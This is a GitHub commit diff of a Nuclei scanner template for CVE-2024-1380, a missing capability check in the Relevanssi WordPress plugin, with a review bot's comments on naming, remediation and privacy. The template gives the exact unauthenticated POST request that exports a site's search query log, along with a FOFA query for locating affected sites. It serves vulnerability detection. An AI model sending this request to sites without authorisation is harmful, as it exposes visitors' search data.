updated macthers,path,req & info

patch-4
Ritik Chaddha 2024-06-05 12:33:25 +05:30 committed by GitHub
parent 0bba442795
commit dba6004666
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 16 additions and 13 deletions


@ -1,36 +1,39 @@
id: CVE-2024-1380 id: CVE-2024-1380
info: info:
name: Relevanssi - A Better Search <= 4.22.0 - Unauthenticated Query Log Export name: Relevanssi (A Better Search) <= 4.22.0 - Query Log Export
author: FLX author: FLX
severity: medium severity: medium
description: | description: |
The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.
reference: reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1380
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-1380
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3 cvss-score: 5.3
cve-id: CVE-2024-1380 cve-id: CVE-2024-1380
epss-score: 0.00043 epss-score: 0.00043
epss-percentile: 0.0866 epss-percentile: 0.0866
tags: wordpress,relevanssi,cve,vulnerability,cve2024 metadata:
verified: true
max-request: 1
fofa-query: "/wp-content/plugins/relevanssi/"
tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure
http: http:
- method: POST - raw:
path: - |
- "{{BaseURL}}/wp-admin/admin-ajax.php" POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
headers: action=&relevanssi_export=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
body: "action=&relevanssi_export=1"
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'status_code == 200' - 'status_code == 200'
- 'contains(header, "Content-Disposition: attachment;filename=relevanssi_log.csv")' - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")'
- 'contains(header, "Content-Type: application/download")' condition: and
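Review bot: The new `name` drops "Unauthenticated" even though the description and the `PR:N` in the CVSS vector both say no login is needed, so the finding title no longer tells a triager that the export is reachable anonymously. I would keep it as `name: Relevanssi (A Better Search) <= 4.22.0 - Unauthenticated Query Log Export`. The info block also has no `remediation:` entry; going only by the description, it can say to update the plugin to a release later than 4.22.0. A positive match means the response body is the site's real query log, so a comment above `matchers:` noting that stored scan responses may contain visitors' search terms would help whoever handles the output.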